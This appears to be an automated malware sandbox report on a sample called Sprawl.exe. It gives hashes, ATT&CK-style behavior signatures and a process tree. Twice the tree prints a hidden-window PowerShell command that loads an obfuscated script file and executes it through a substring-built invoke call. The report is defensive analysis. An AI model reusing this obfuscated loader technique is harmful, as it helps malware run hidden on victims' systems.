Analysis
-
max time kernel
118s -
max time network
124s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
22-10-2024 14:03
Static task
static1
Behavioral task
behavioral1
Sample
Sprawl.exe
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
Sprawl.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
Paraffinerer.ps1
Resource
win7-20241010-en
Behavioral task
behavioral4
Sample
Paraffinerer.ps1
Resource
win10v2004-20241007-en
General
-
Target
Sprawl.exe
-
Size
859KB
-
MD5
47fd98348b7d314e4e9dae46e5f1e1a1
-
SHA1
cafe48404707e61235bfbe6646d8072af4298e21
-
SHA256
125b4582b7dd2221044fb257f580da57e4dc61b03a6c35e208fed973f71c28a1
-
SHA512
8a1deda7d7e8e80d8b2e62ad0d9d4400b1d865ea322955e577fc439a8a0f1d6d3cb912397ecb6458941fd7fd566c1fdbdf4c4ed02c72234fa543bfcb45db845a
-
SSDEEP
12288:l9/IyjazmRR+BZhOLlpJjdCPwwdw6ETeVlCE7vkQymGwSW01hXqvjoaCi7lnsZzz:/A/KqZhOnJdyzp+alCJmvulW6Nd0vo
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
Processes:
powershell.exepowershell.exepid process 2932 powershell.exe 3064 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
powershell.exeSprawl.exepowershell.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Sprawl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepowershell.exepid process 2932 powershell.exe 3064 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 2932 powershell.exe Token: SeDebugPrivilege 3064 powershell.exe -
Suspicious use of WriteProcessMemory 8 IoCs
Processes:
Sprawl.exedescription pid process target process PID 2868 wrote to memory of 2932 2868 Sprawl.exe powershell.exe PID 2868 wrote to memory of 2932 2868 Sprawl.exe powershell.exe PID 2868 wrote to memory of 2932 2868 Sprawl.exe powershell.exe PID 2868 wrote to memory of 2932 2868 Sprawl.exe powershell.exe PID 2868 wrote to memory of 3064 2868 Sprawl.exe powershell.exe PID 2868 wrote to memory of 3064 2868 Sprawl.exe powershell.exe PID 2868 wrote to memory of 3064 2868 Sprawl.exe powershell.exe PID 2868 wrote to memory of 3064 2868 Sprawl.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Sprawl.exe"C:\Users\Admin\AppData\Local\Temp\Sprawl.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2868 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle hidden "$Sensitometer42=Get-Content -raw 'C:\Users\Admin\AppData\Roaming\underarmsmusklens\Edriophthalmian\Paraffinerer.Dej';$Loveliest=$Sensitometer42.SubString(55162,3);.$Loveliest($Sensitometer42)"2⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2932 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle hidden "$Sensitometer42=Get-Content -raw 'C:\Users\Admin\AppData\Roaming\underarmsmusklens\Edriophthalmian\Paraffinerer.Dej';$Loveliest=$Sensitometer42.SubString(55162,3);.$Loveliest($Sensitometer42)"2⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3064
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD5c786fdc8d6b86c034144cb0426006ed0
SHA13dd58853ae13bd815aab6345f594b9d195b94aec
SHA256e8d5e62ebac31c0e075babafd2db24d407139eb3edb2da515f214a0e690d6b68
SHA512ae403bc3408a8ed4feeaa1c9a26c455519ae50c88acde47eab20f6ad959a09e485dce915d731abadb5b5f0a96e315fcb9082dac73d5a99037953cf11882b9ba9